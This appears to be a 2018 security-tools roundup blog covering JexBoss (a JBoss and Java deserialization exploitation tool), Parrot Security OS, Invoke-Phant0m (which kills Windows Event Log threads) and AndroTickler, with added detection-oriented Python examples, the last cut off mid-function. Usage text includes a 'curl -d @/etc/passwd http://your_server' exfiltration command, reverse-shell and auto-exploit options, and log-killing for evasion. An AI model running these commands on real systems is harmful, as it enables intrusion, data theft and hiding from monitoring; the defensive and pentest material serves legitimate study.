
Saturday, January 27, 2018

JBoss (and other Java Deserialization Vulnerabilities) Verify and Exploitation Tool - JexBoss

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and in other Java platforms, frameworks and applications.

Requirements

Installation on Linux/Mac
To install the latest version of JexBoss, please use the following commands:
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080

OR:

Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip
unzip master.zip
cd jexboss-master
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080
If you are using CentOS with Python 2.6, please install Python 2.7. Example installation of Python 2.7 on CentOS using Software Collections (scl):
yum -y install centos-release-scl
yum -y install python27
scl enable python27 bash

Installation on Windows
If you are using Windows, you can run JexBoss from Git Bash. Follow the steps below:
  • Download and install Python
  • Download and install Git for Windows
  • After installing, open Git Bash and type the following commands (Git Bash uses POSIX-style paths, so C:\Python27 becomes /c/Python27):
    export PATH="$PATH:/c/Python27:/c/Python27/Scripts"
    git clone https://github.com/joaomatosf/jexboss.git
    cd jexboss
    pip install -r requires.txt
    python jexboss.py -h
    python jexboss.py -host http://target_host:8080
    

Features
The tool and exploits were developed and tested for:
  • JBoss Application Server versions: 3, 4, 5 and 6.
  • Java Deserialization Vulnerabilities in multiple Java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-8103), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc.)
The exploitation vectors are:
  • /admin-console
    • tested and working in JBoss versions 5 and 6
  • /jmx-console
    • tested and working in JBoss versions 4, 5 and 6
  • /web-console/Invoker
    • tested and working in JBoss versions 4, 5 and 6
  • /invoker/JMXInvokerServlet
    • tested and working in JBoss versions 4, 5 and 6
  • Application Deserialization
    • tested and working against multiple Java applications, platforms, etc., via HTTP POST parameters
  • Servlet Deserialization
    • tested and working against multiple Java applications, platforms, etc., via servlets that process serialized objects (e.g. when you see an "Invoker" in a link)
  • Apache Struts2 CVE-2017-5638
    • tested in Apache Struts 2 applications
  • Others
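As an added example (not JexBoss's own code), here is the scan-and-probe logic the vector list above implies: expand a CIDR and port list the way auto-scan mode interprets -network and -ports, request each vector path on each host, and report which ones answer. The HTTP fetch is injected so the example runs offline against constructed responses; the response markers used to decide "exposed" (page titles for the consoles, a Java serialization stream header for the invoker servlets) are this example's assumptions, not the checks JexBoss itself performs.

```python
import ipaddress
from typing import Callable, Dict, List, Tuple

# Java serialization stream header (ObjectStreamConstants STREAM_MAGIC 0xACED,
# STREAM_VERSION 0x0005). A servlet that answers a bare GET with this header is
# speaking native Java serialization to unauthenticated clients.
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"

# (path, marker): a vector counts as exposed when HTTP 200 is returned and the
# marker appears in the body. The markers are assumptions made for this example.
VECTORS: List[Tuple[str, bytes]] = [
    ("/jmx-console/", b"JMX Agent View"),
    ("/web-console/Invoker", JAVA_STREAM_MAGIC),
    ("/invoker/JMXInvokerServlet", JAVA_STREAM_MAGIC),
    ("/admin-console/", b"Administration Console"),
]

# fetch(url) -> (status_code, body); a real scanner would wrap urllib/requests.
Fetch = Callable[[str], Tuple[int, bytes]]


def probe_host(base_url: str, fetch: Fetch) -> List[str]:
    """Return the vector paths that look exposed on one host (in VECTORS order)."""
    exposed = []
    for path, marker in VECTORS:
        try:
            status, body = fetch(base_url.rstrip("/") + path)
        except OSError:
            continue  # closed port or timeout: not exposed
        if status == 200 and marker in body:
            exposed.append(path)
    return exposed


def targets(network: str, ports: str) -> List[str]:
    """Expand a CIDR plus comma-separated port list into base URLs, the way
    '-network 192.168.0.0/24 -ports 8080,80' is interpreted in auto-scan mode."""
    net = ipaddress.ip_network(network, strict=False)
    port_list = [int(p) for p in ports.split(",") if p.strip()]
    hosts = [net.network_address] if net.num_addresses == 1 else list(net.hosts())
    return [f"http://{ip}:{port}" for ip in hosts for port in port_list]


def auto_scan(network: str, ports: str, fetch: Fetch) -> Dict[str, List[str]]:
    """Map each base URL with at least one exposed vector to its vector list."""
    results: Dict[str, List[str]] = {}
    for url in targets(network, ports):
        found = probe_host(url, fetch)
        if found:
            results[url] = found
    return results


# Constructed responses standing in for a live network: one host exposing the
# JMX console and the JMXInvokerServlet, everything else closed or protected.
FAKE_RESPONSES: Dict[str, Tuple[int, bytes]] = {
    "http://192.168.0.26:8080/jmx-console/": (200, b"<title>JBoss JMX Management Console</title><h1>JMX Agent View</h1>"),
    "http://192.168.0.26:8080/invoker/JMXInvokerServlet": (200, JAVA_STREAM_MAGIC + b"\x73\x72"),
    "http://192.168.0.26:8080/admin-console/": (401, b"Unauthorized"),
    "http://192.168.0.25:8080/jmx-console/": (404, b"Not Found"),
}


def fake_fetch(url: str) -> Tuple[int, bytes]:
    """Offline stand-in for an HTTP GET; unknown URLs behave like a refused connection."""
    if url not in FAKE_RESPONSES:
        raise OSError("connection refused")
    return FAKE_RESPONSES[url]


if __name__ == "__main__":
    for host, vectors in auto_scan("192.168.0.24/30", "8080", fake_fetch).items():
        print(host, "->", ", ".join(vectors))
```

Swap fake_fetch for a real GET with a short timeout and the loop behaves like auto-scan mode; an admin-console that answers 401 is deliberately not counted, because the page's admin-console vector needs valid credentials (-J) and a reachable login form, not just a reachable path.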

Videos
  • Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss

  • Exploiting JBoss Application Server with JexBoss

  • Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)


Screenshots
  • Simple usage (interactive menu):
$ python jexboss.py
  • Standalone mode against a JBoss host:
$ python jexboss.py -u http://192.168.0.26:8080
  • Usage modes:
$ python jexboss.py -h
  • Network scan mode:
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt
  • Network scan with auto-exploit mode:
$ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt
  • Results and recommendations (printed after each check)

Reverse Shell (meterpreter integration)
After you exploit a JBoss server, you can use JexBoss's own command shell or open a reverse connection with the following command:
   jexremote=YOUR_IP:YOUR_PORT

   Example:
     Shell>jexremote=192.168.0.10:4444

When exploiting Java deserialization vulnerabilities (Application Deserialization, Servlet Deserialization), the default options are to open a reverse shell connection or to send a command to execute.

Usage examples
  • For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl -d @/etc/passwd http://your_server'
  • For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name
  • For Java Deserialization Vulnerabilities in a Servlet (like Invoker):
$ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize
  • For Apache Struts 2 (CVE-2017-5638)
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2
  • For Apache Struts 2 (CVE-2017-5638) with cookies for authenticated resources
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies "JSESSIONID=24517D9075136F202DCE20E9C89D424D"
  • Auto scan mode:
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log
  • File scan mode:
$ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log
  • More Options:
optional arguments:
  -h, --help            show this help message and exit
  --version             show program's version number and exit
  --auto-exploit, -A    Send exploit code automatically (USE ONLY IF YOU HAVE
                        PERMISSION!!!)
  --disable-check-updates, -D
                        Disable two updates checks: 1) Check for updates
                        performed by the webshell in exploited server at
                        http://webshell.jexboss.net/jsp_version.txt and 2)
                        check for updates performed by the jexboss client at
                        http://joaomatosf.com/rnp/releases.txt
  -mode {standalone,auto-scan,file-scan}
                        Operation mode (DEFAULT: standalone)
  --app-unserialize, -j
                        Check for java unserialization vulnerabilities in HTTP
                        parameters (eg. javax.faces.ViewState, oldFormData,
                        etc)
  --servlet-unserialize, -l
                        Check for java unserialization vulnerabilities in
                        Servlets (like Invoker interfaces)
  --jboss               Check only for JBOSS vectors.
  --jenkins             Check only for Jenkins CLI vector.
  --jmxtomcat           Check JMX JmxRemoteLifecycleListener in Tomcat
                        (CVE-2016-3427 and CVE-2016-8735). OBS: Will not be
                        checked by default.
  --proxy PROXY, -P PROXY
                        Use a http proxy to connect to the target URL (eg. -P
                        http://192.168.0.1:3128)
  --proxy-cred LOGIN:PASS, -L LOGIN:PASS
                        Proxy authentication credentials (eg -L name:password)
  --jboss-login LOGIN:PASS, -J LOGIN:PASS
                        JBoss login and password for exploit admin-console in
                        JBoss 5 and JBoss 6 (default: admin:admin)
  --timeout TIMEOUT     Seconds to wait before timeout connection (default 3)

Standalone mode:
  -host HOST, -u HOST   Host address to be checked (eg. -u
                        http://192.168.0.10:8080)

Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):
  --reverse-host RHOST:RPORT, -r RHOST:RPORT
                        Remote host address and port for reverse shell when
                        exploiting Java Deserialization Vulnerabilities in
                        application layer (for now, working only against *nix
                        systems)(eg. 192.168.0.10:1331)
  --cmd CMD, -x CMD     Send specific command to run on target (eg. curl -d
                        @/etc/passwd http://your_server)
  --windows, -w         Specifies that the commands are for WINDOWS systems
                        (cmd.exe)
  --post-parameter PARAMETER, -H PARAMETER
                        Specify the parameter to find and inject serialized
                        objects into it. (egs. -H javax.faces.ViewState or -H
                        oldFormData (<- Hi PayPal =X) or others) (DEFAULT:
                        javax.faces.ViewState)
  --show-payload, -t    Print the generated payload.
  --gadget {commons-collections3.1,commons-collections4.0,groovy1}
                        Specify the type of Gadget to generate the payload
                        automatically. (DEFAULT: commons-collections3.1, or
                        groovy1 for Jenkins)
  --load-gadget FILENAME
                        Provide your own gadget from file (a java serialized
                        object in RAW mode)
  --force, -F           Force send java serialized gadgets to URL informed in
                        -u parameter. This will send the payload in multiple
                        formats (eg. RAW, GZIPED and BASE64) and with
                        different Content-Types.

Auto scan mode:
  -network NETWORK      Network to be checked in CIDR format (eg. 10.0.0.0/8)
  -ports PORTS          List of ports separated by commas to be checked for
                        each host (eg. 8080,8443,8888,80,443)
  -results FILENAME     File name to store the auto scan results

File scan mode:
  -file FILENAME_HOSTS  Filename with host list to be scanned (one host per
                        line)
  -out FILENAME_RESULTS
                        File name to store the file scan results
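What the application-layer options above put on the wire is a Java serialized object, sent raw, gzipped, base64-encoded, or base64 over gzip (the formats --force cycles through). The following added example, which is not JexBoss code, does the reverse job a reviewer or WAF author needs: recognise such an object in a parameter value whatever the encoding layer, and pull the class names out of the stream so that a gadget library such as commons-collections or groovy (the --gadget choices) stands out. The sample stream and the package-to-library map are constructed for this example; the stream is shaped like a real one but is not a working gadget chain.

```python
import base64
import binascii
import gzip
import struct
from typing import Dict, List, Optional, Tuple

STREAM_MAGIC = b"\xac\xed\x00\x05"  # ObjectStreamConstants: STREAM_MAGIC + STREAM_VERSION
TC_CLASSDESC = 0x72                 # tag that precedes a class name (2-byte length + UTF-8)
NAME_BYTES = frozenset(b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.$_[;/")

# Package prefixes of the gadget libraries JexBoss can target (assumption: a
# small map kept for this example, keyed on the libraries' package names).
GADGET_PACKAGES: Dict[str, str] = {
    "org.apache.commons.collections.": "commons-collections3",
    "org.apache.commons.collections4.": "commons-collections4",
    "org.codehaus.groovy.": "groovy",
}


def decode_candidate(value: bytes) -> Optional[Tuple[str, bytes]]:
    """Peel base64 / gzip layers off a parameter value. Returns (layers, stream)
    when a Java serialization stream is found, else None."""
    layers: List[str] = []
    data = value
    for _ in range(3):  # deepest case sent: base64(gzip(raw))
        if data.startswith(STREAM_MAGIC):
            return ("+".join(layers) or "raw", data)
        if data[:2] == b"\x1f\x8b":  # gzip member header
            try:
                data = gzip.decompress(data)
            except (OSError, EOFError):
                return None
            layers.append("gzip")
            continue
        try:
            decoded = base64.b64decode(data, validate=True)
        except (binascii.Error, ValueError):
            return None
        if not decoded:
            return None
        data = decoded
        layers.append("base64")
    return None


def class_names(stream: bytes) -> List[str]:
    """Scan for TC_CLASSDESC tags and return the class names that follow them.
    A heuristic walk, not a full ObjectInputStream parser, so it also copes
    with truncated or hand-built streams."""
    names: List[str] = []
    i = len(STREAM_MAGIC)
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC:
            (n,) = struct.unpack(">H", stream[i + 1:i + 3])
            raw_name = stream[i + 3:i + 3 + n]
            if n and len(raw_name) == n and all(b in NAME_BYTES for b in raw_name):
                names.append(raw_name.decode("ascii"))
                i += 3 + n
                continue
        i += 1
    return names


def suspected_gadgets(names: List[str]) -> List[str]:
    """Libraries from GADGET_PACKAGES referenced by the stream's class names."""
    return sorted({lib for name in names for pkg, lib in GADGET_PACKAGES.items() if name.startswith(pkg)})


def triage(value: bytes) -> Optional[Dict[str, object]]:
    """One-call summary for a parameter value such as javax.faces.ViewState."""
    found = decode_candidate(value)
    if found is None:
        return None
    layers, stream = found
    names = class_names(stream)
    return {"encoding": layers, "classes": names, "gadgets": suspected_gadgets(names)}


# Constructed sample: two class descriptors laid out like the real format
# (TC_OBJECT, TC_CLASSDESC, name, serialVersionUID, flags, 0 fields,
# TC_ENDBLOCKDATA, TC_NULL superclass). Not an executable gadget chain.
def _classdesc(name: bytes) -> bytes:
    return bytes([TC_CLASSDESC]) + struct.pack(">H", len(name)) + name + b"\x00" * 8 + b"\x02\x00\x00\x78\x70"


SAMPLE_STREAM = (
    STREAM_MAGIC
    + b"\x73" + _classdesc(b"org.apache.commons.collections.functors.InvokerTransformer")
    + b"\x73" + _classdesc(b"java.util.HashMap")
)
SAMPLE_B64 = base64.b64encode(SAMPLE_STREAM)                 # plain base64 form
SAMPLE_GZIP = gzip.compress(SAMPLE_STREAM)                   # gzipped form
SAMPLE_VIEWSTATE = base64.b64encode(SAMPLE_GZIP)             # base64 over gzip, as --force sends

if __name__ == "__main__":
    print(triage(SAMPLE_VIEWSTATE))
    print(triage(b"dGhpcyBpcyBub3QgamF2YQ=="))  # base64 of plain text -> None
```

ViewState values arrive URL-encoded inside a form body; URL-decode and strip whitespace before calling triage(), since strict base64 validation rejects stray characters. A value that decodes to a stream naming commons-collections or groovy classes in a request to a page that never legitimately deserializes those is the request-side signature of the attacks this tool automates.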



Thursday, January 25, 2018

Security Oriented GNU/Linux Distribution - Parrot Security 3.10


Security GNU/Linux distribution designed with cloud pentesting and IoT security in mind.

It includes a full portable laboratory for security and digital forensics experts, but it also includes everything you need to develop your own software or protect your privacy with anonymity and crypto tools.

Details

Security

Parrot Security includes a full arsenal of security oriented tools to perform penetration tests, security audits and more. With a Parrot USB drive in your pocket you will always have everything you need with you.

Privacy

Parrot includes by default Tor, I2P, anonsurf, gpg, tccf, zulucrypt, veracrypt, truecrypt, LUKS and many other technologies designed to defend your privacy and your identity.

Development

If you need a comfortable environment with updated frameworks and useful libraries already installed, Parrot will amaze you as it includes a full development-oriented environment with some powerful editors and IDEs pre-installed and many other tools installable from our repository.

Features

System Specs
  • Debian GNU/Linux 9 (stretch)
  • Custom hardened Linux 4.8 kernel
  • Rolling release updates
  • Powerful worldwide mirror servers
  • High hardware compatibility
  • Community-driven development
  • free(libre) and open source project

Cryptography

Parrot includes many cryptographic tools which are extremely useful when it comes to protecting your confidential data and defending your privacy.

Parrot includes several cryptographic front-ends to work with both symmetric and asymmetric encryption; in fact it natively supports volume encryption with LUKS, TrueCrypt and VeraCrypt, including hidden TrueCrypt/VeraCrypt volumes and cascaded (nested) cipher algorithms.

The whole system can be installed inside an encrypted partition to protect your computer in case of theft.

Another Swiss army knife for your privacy is GPG, the GNU Privacy Guard, a powerful OpenPGP implementation. It lets you create a private/public key pair to digitally sign your messages and to let other people send you encrypted messages that only your private key can decrypt. It can also handle multiple identities and subkeys, and its strength lies in the web of trust: PGP users sign each other's keys so that others can tell whether a digital identity is valid or not.

Even our software repository is digitally signed with GPG, and the system automatically verifies whether an update was altered or compromised: it refuses to upgrade or install new software if our signature is missing or invalid.

Privacy

Your privacy is the most valuable thing you have in your digital life, and the whole Parrot Team is exaggeratedly paranoid when it comes to user privacy; in fact our system contains no tracking components and is hardened in depth to protect users from prying eyes.

Parrot has developed and implemented several tricks and tools to achieve this goal. AnonSurf is one of the most important examples: it starts Tor and routes all of the system's internet traffic through the Tor network, and we have also modified the system to use DNS servers other than those offered by your internet provider.

Parrot also includes torbrowser, torchat and other anonymity services, such as I2P, a powerful alternative to Tor.

Programming

The main goal of an environment designed by hackers for hackers is the ability to change it, adapt it, transform it and use it as a development platform to create new things. This is why Parrot comes out of the box with several tools for developers, such as compilers, disassemblers, IDEs, comfortable editors and powerful frameworks.

Parrot includes QtCreator as its main C, C++ and Qt framework IDE. Another very useful tool is Geany, a lightweight and simple IDE which supports a huge number of programming languages. Atom, the open-source editor developed by GitHub, is also included, and many compilers and interpreters with their most important libraries are pre-installed and ready to use.

And of course many other editors, development tools and libraries are available through our software repository, where all the development tools are kept updated to their most cutting-edge but reliable version.

Changelog

The first big news is the introduction of a full firejail+apparmor sandboxing system to proactively protect the OS by isolating its components with a combination of different techniques. The first experiments were already introduced in Parrot 3.9 with the inclusion of firejail.

Parrot 3.10 also introduces the new Firefox 57 (Quantum), which landed on Parrot very naturally with a complete browser restyle.

The other big news is the introduction of the latest Linux 4.14 kernel, a very important improvement for us because of the new features of this kernel release and its improved hardware support.

Some pentest tools received important upstream updates: metasploit-framework reached version 4.21, and maltegoce and casefile were merged into a single launcher provided by the new maltego 4.1.

To upgrade the system, open a terminal window and type the following command
sudo apt update && sudo apt full-upgrade



Windows Event Log Killer - Invoke-Phant0m


This script walks the thread stacks of the Event Log Service process (the specific svchost.exe hosting it), identifies the Event Log Service threads and kills them. The system will then no longer be able to collect logs, while the Event Log Service still appears to be running.
I have made this script for two reasons. First, this script will help Red Teams and Penetration Testers. Second, I want to learn PowerShell and low-level things in PowerShell for the cyber security field.
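Because the service keeps reporting Running, the usable signal that this has happened is that channels stop receiving records. The following added example (Python, not part of Invoke-Phant0m) is a defender-side check for exactly that state: it learns each channel's typical gap between records from recent history and flags a channel whose current silence is far outside it while the service still claims to be running. The event records and the service state are constructed for the example; in production they would come from Get-WinEvent and Get-Service output.

```python
from datetime import datetime, timedelta
from statistics import median
from typing import Dict, List, Tuple

# (TimeCreated, channel, EventID) as exported from Get-WinEvent; constructed here.
Event = Tuple[datetime, str, int]


def channel_silence(events: List[Event], now: datetime, factor: float = 10.0,
                    min_silence: timedelta = timedelta(minutes=5)) -> Dict[str, dict]:
    """Per channel: seconds since the last record, the channel's median gap between
    records, and whether the current silence is abnormal. A channel is suspicious
    when its silence exceeds both min_silence and factor x its median gap."""
    by_channel: Dict[str, List[datetime]] = {}
    for ts, channel, _ in sorted(events):
        by_channel.setdefault(channel, []).append(ts)
    report: Dict[str, dict] = {}
    for channel, stamps in by_channel.items():
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        typical = median(gaps) if gaps else None
        silence = (now - stamps[-1]).total_seconds()
        threshold = min_silence.total_seconds()
        if typical is not None:
            threshold = max(threshold, factor * typical)
        report[channel] = {"silence_s": silence, "typical_gap_s": typical,
                           "suspicious": silence > threshold}
    return report


def phantom_indicators(service_status: str, report: Dict[str, dict]) -> List[str]:
    """The state Invoke-Phant0m leaves behind: EventLog service 'Running' while
    normally chatty channels have gone quiet. A stopped service is a different
    (and much louder) condition, so it is deliberately not reported here."""
    if service_status.strip().lower() != "running":
        return []
    return sorted(ch for ch, r in report.items() if r["suspicious"])


# Constructed sample: Security logs a 4624 every 30 s until 12:10 and then nothing;
# System keeps its usual 10-minute cadence. The check runs at 12:40.
T0 = datetime(2018, 1, 25, 12, 0, 0)
SAMPLE_EVENTS: List[Event] = (
    [(T0 + timedelta(seconds=30 * i), "Security", 4624) for i in range(21)]
    + [(T0 + timedelta(minutes=10 * i), "System", 7036) for i in range(4)]
)
NOW = T0 + timedelta(minutes=40)

if __name__ == "__main__":
    rep = channel_silence(SAMPLE_EVENTS, NOW)
    for ch, r in rep.items():
        print(f"{ch:10s} silent {r['silence_s']:6.0f}s (typical gap {r['typical_gap_s']}s) suspicious={r['suspicious']}")
    print("alert on:", phantom_indicators("Running", rep))
```

A cheaper complement that needs no baseline is a canary: write a test event (eventcreate or Write-EventLog) and confirm it shows up in the channel within a few seconds; a canary that never lands while the service reports Running is the same indicator, and the forwarded-log side of a SIEM can run the same silence check per host.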

Usage
PS C:\> Invoke-Phant0m
        _                 _    ___
  _ __ | |__   __ _ _ __ | |_ / _ \ _ __ ___
 | '_ \| '_ \ / _` | '_ \| __| | | | '_ ` _ \
 | |_) | | | | (_| | | | | |_| |_| | | | | | |
 | .__/|_| |_|\__,_|_| |_|\__|\___/|_| |_| |_|
 |_|


[!] I'm here to blur the line between life and death...

[*] Enumerating threads of PID: 1000...
[*] Parsing Event Log Service Threads...
[+] Thread 1001 Succesfully Killed!
[+] Thread 1002 Succesfully Killed!
[+] Thread 1003 Succesfully Killed!
[+] Thread 1004 Succesfully Killed!

[+] All done, you are ready to go!

Technical Details
https://artofpwn.com/phant0m-killing-windows-event-log.html



Penetration Testing and Auditing Toolkit for Android Apps - AndroTickler



A java tool that helps to pentest Android apps faster, more easily and more efficiently. AndroTickler offers many features of information gathering, static and dynamic checks that cover most of the aspects of Android apps pentesting. It also offers several features that pentesters need during their pentests. AndroTickler also integrates with Frida to provide method tracing and manipulation. It was previously published under the name of Tickler.


AndroTickler requires a Linux host and a rooted Android device connected over USB. The tool does not install anything on the Android device; it only creates a Tickler directory on /sdcard. AndroTickler depends on the Android SDK to run commands on the device and to copy the app's data to the TicklerWorkspace directory on the host for further analysis. TicklerWorkspace is the working directory of AndroTickler, and each app has a separate subdirectory in TicklerWorkspace which can contain the following (depending on user actions):
  • DataDir directory: a copy of the data directory of the app
  • extracted directory: Output of apktool on the app, contains smali code, resources, libraries...etc.
  • bgSnapshots directory: Contains background snapshots copied from the device.
  • images directory: contains any screenshots taken for the app.
  • JavaCode directory: Contains app's Java code decompiled by dex2jar and JD tools
  • logs directory: contains log files produced by -t -log, as explained below
  • transfers: files and directories copied from the device to the host using -copy2host
  • AndroidManifest.xml: The manifest file of the app as per apktool
  • base.apk: the APK file of the app, installed on the device
  • debuggable.apk: a debuggable version of the app, produced by -dbg
The Tickler_lib directory and the Tickler.conf configuration file live in the same directory as the jar file. The configuration file sets the location of the TicklerDir directory on the host and of the Tickler directory on /sdcard of the Android device. If the configuration file does not exist or these 2 directories are not set, default values are used (Tickler_workspace in the current directory and /sdcard/Tickler respectively). The Tickler_lib directory contains some Java libraries and external tools used by AndroTickler, such as apktool and dex2jar.
AndroTickler highly depends on the following tools, so they should exist on your machine before using it:
  • Java 7 or higher
  • Android SDK tools (adb and friends)
  • sqlite3
Other tools are required for some features, but AndroTickler can still run without them:
  • Frida
  • jarsigner

How to use it
  1. Build the tool from source
  2. Move AndroTickler.jar to the same directory as the Tickler_lib directory and the Tickler.conf file (automatically created in build/libs)
  3. Connect your Android device with the application-to-test installed on it

Install
curl -s "https://get.sdkman.io" | bash
source "$HOME/.sdkman/bin/sdkman-init.sh"
sdk install gradle 4.4
git clone https://github.com/ernw/AndroTickler
cd AndroTickler
gradle build

The current version does the following:
Command help
java -jar AndroTickler.jar -h

Information gathering/Static analysis:
List installed Apps on the device:
java -jar AndroTickler.jar -pkgs
Searches for an app (package) installed on the device whose package name contains searchKey:
java -jar AndroTickler.jar -findPkg <searchKey>

Package without extra attributes
java -jar AndroTickler.jar -pkg <package> [other options]
Any command with a -pkg option (whether combined with any of the following options or not) performs the following actions if they have not been done before:
  • Copies the app from the device
  • Extracts the Manifest file of the app
  • Decompiles the app to Java code using dex2jar and JD tools

General Info
java -jar AndroTickler.jar -pkg <package> -info
Returns the following information:
  • App's user ID
  • App's directory paths
  • Whether the app's code indicates usage of external storage
  • App's directories that already exist in external storage
  • Content URIs in the code
  • Whether the app allows backup (android:allowBackup)
  • Whether the app is debuggable
  • Data schemes (similar to iOS IPC URL schemes)
  • The permissions it uses

Code Squeezing
java -jar AndroTickler.jar -pkg <package> -squeeze [short | <codeLocation> ]
Fetches the following from the decompiled Java code of the app:
  • Log messages
  • Any indication of possible user credentials
  • Java comments
  • Used libs
  • URLs in code
  • Usage of shared preferences
  • Usage of external storage
  • Common components such as OkHttp and WebView
Unsurprisingly, its output is usually huge, so it is recommended to redirect the command's output to a file.
  • short: squeezes only the decompiled code that belongs to the developer. For example, if an app has the package name com.notEnaf.myapp, then -squeeze short squeezes only the code in the com/notEnaf directory.
  • <codeLocation>: squeezes only the code in the codeLocation directory. Helpful to limit your search, or to squeeze the source code if it is available.

Listing Components
java -jar AndroTickler.jar -pkg <package> -l [-exp] [-v]
Lists all components of the app
-exp Shows only exported components
-v Gives more detailed information for each component:
  • Component type
  • Whether exported or not
  • Its intent filters
  • The tool checks the corresponding Java class to each component and returns all possible intent extras

Listing any kind of components
java -jar AndroTickler.jar -pkg <package> -l [-act | -ser | -rec | -prov ] [-exp] [-v]
  • -act : activities
  • -ser : services
  • -rec: broadcast receivers
  • -prov: Content providers
  • -exp: show only exported components of any of the above type

Databases
java -jar AndroTickler.jar -pkg <package> -db [|e|l|d] [nu]
By default, all -db commands update the app's data storage directory on the host before running the check.
  • no attribute OR e: tests whether the databases of the app are encrypted. This is the default action if no option is given after the -db flag.
  • l: lists all databases of the app. Encrypted databases might not be detected.
  • d: takes a sqlite dump of any of the unencrypted databases.
  • nu (noUpdate): runs any of the above options without updating the app's data directory on the host.

Data Storage Directory Comparison
java -jar AndroTickler.jar -pkg <package> -diff [d|detailed]
Copies the data storage directory of the app (to DataDirOld) then asks the user to do the action he wants and to press Enter when he's done. Then it copies the data storage directory again (to DataDir) and runs diff between them to show which files got added, deleted or modified.
d|detailed Does the same as the normal -diff command, also shows what exactly changed in text files and unencrypted databases.

Search

Code
java -jar AndroTickler.jar -pkg <package> -sc <key> [<customLocation>]
Searches for the key in the following locations:
  • The decompiled Java code of the app
  • res/values/strings.xml
  • res/values/arrays.xml
Search is case insensitive.
<customLocation>: searches this directory instead of the decompiled Java code location.

Storage
java -jar AndroTickler.jar -pkg <package> -sd <key>
Searches the Data storage directory of the app for the given key

Tickling
Triggers components of the app with all possible combinations of intents. For example, if an activity has an intent-filter with 2 possible actions and 3 data URI schemes, then AndroTickler will trigger this activity with all possible combinations of that intent. Additionally, AndroTickler captures the intent extras referenced in the Java class corresponding to the component, assigns them dummy values and adds them to the possible intent combinations. Only extras of type boolean, string, int and float are supported.
If the -exp option is used, the components are triggered without root privileges or any special permissions. Otherwise, the components are triggered with root privileges. This helps to test the app in 2 different scenarios: against a normal-privileged or a high-privileged attacker.
Before triggering components, AndroTickler prints all the commands to be executed. Then for each command it triggers the component, prints the command and waits for the user. This gives the user enough time to do any extra checks after the command's execution. Before moving on to the next command, the user is given the option to capture a screenshot of the device for PoC documentation.
java -jar AndroTickler.jar -pkg <package> -t [-all | -exp] [target] [-log]
target, as explained for the list command, can be:
  • -act : activities. Starts the activity/activities with all intent combinations as explained above
  • -ser : services. Starts the service(s) with all intent combinations as explained above
  • -rec : broadcast receivers. Sends all possible broadcast messages that would match the broadcast receiver(s)
  • -prov : content providers. Queries the content provider(s)
If no value is given, the target is all of the above.
  • [-comp] <component_name>: specifies one component only. You can also use <component_name> directly without the -comp flag.
  • -exp: AndroTickler uses normal privileges to trigger only the exported targets.
  • -all: the default option. AndroTickler uses root privileges to trigger the targets.
  • -log: captures all logcat messages generated during the triggering session. The log file is saved in the logs subdirectory.
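The following added example (Python, not AndroTickler's Java code) shows the listing and tickling logic from the sections above in a form that runs offline: it parses a constructed AndroidManifest.xml, decides which components are exported, and generates the am start / startservice / broadcast commands for every action x data-scheme combination, with dummy-valued extras attached. The manifest, the component and extra names and the dummy values are assumptions made for the example. The exported rule implemented is the standard manifest one (an explicit android:exported wins; otherwise an intent-filter makes the component exported), with content providers treated as not exported because their default depends on the target SDK.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional, Tuple

ANDROID = "{http://schemas.android.com/apk/res/android}"   # manifest attribute namespace
AM_VERB = {"activity": "start", "service": "startservice", "receiver": "broadcast"}
# am flag and dummy value for each of the four extra types the tool supports
DUMMY = {"boolean": ("--ez", "true"), "string": ("--es", "tickle"),
         "int": ("--ei", "1"), "float": ("--ef", "1.0")}

# Constructed manifest: one deep-link activity (2 actions x 2 schemes), one
# private service, one exported receiver.
MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.notEnaf.myapp">
  <application>
    <activity android:name=".DeepLinkActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <action android:name="com.notEnaf.OPEN"/>
        <data android:scheme="myapp"/>
        <data android:scheme="https"/>
      </intent-filter>
    </activity>
    <service android:name=".SyncService" android:exported="false"/>
    <receiver android:name=".BootReceiver" android:exported="true"/>
  </application>
</manifest>"""


def components(manifest_xml: str) -> List[Dict]:
    """List components with resolved class name, exported status and
    intent-filters as (actions, schemes) pairs."""
    root = ET.fromstring(manifest_xml)
    pkg = root.get("package")
    found = []
    for tag in ("activity", "service", "receiver", "provider"):
        for el in root.iter(tag):
            name = el.get(ANDROID + "name")
            if name.startswith("."):
                name = pkg + name
            filters = []
            for f in el.findall("intent-filter"):
                actions = [a.get(ANDROID + "name") for a in f.findall("action")]
                schemes = [d.get(ANDROID + "scheme") for d in f.findall("data") if d.get(ANDROID + "scheme")]
                filters.append((actions, schemes))
            exported_attr = el.get(ANDROID + "exported")
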